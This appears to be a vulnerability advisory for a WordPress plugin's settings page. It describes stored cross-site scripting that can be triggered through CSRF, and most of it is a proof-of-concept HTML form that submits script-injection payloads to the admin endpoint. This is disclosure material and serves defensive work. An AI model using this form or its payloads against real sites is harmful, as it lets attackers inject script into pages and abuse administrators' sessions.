The plugin did not sanitise and escape its setting fields, leading to Stored Cross-Site Scripting issues. Furthermore, the lack of CSRF checks could also allow attackers to trigger the XSS via CSRF attacks against a logged in administrator
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=wp-armour" method="POST">
<input type="hidden" name="wpa_field_name" value='"><script>alert(/XSS-Field/)</script>' />
<input type="hidden" name="wpa_error_message" value='"><script>alert(/XSS-Error/)</script>' />
<input type="hidden" name="submit-wpa-general-settings" value="Save General Settings" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>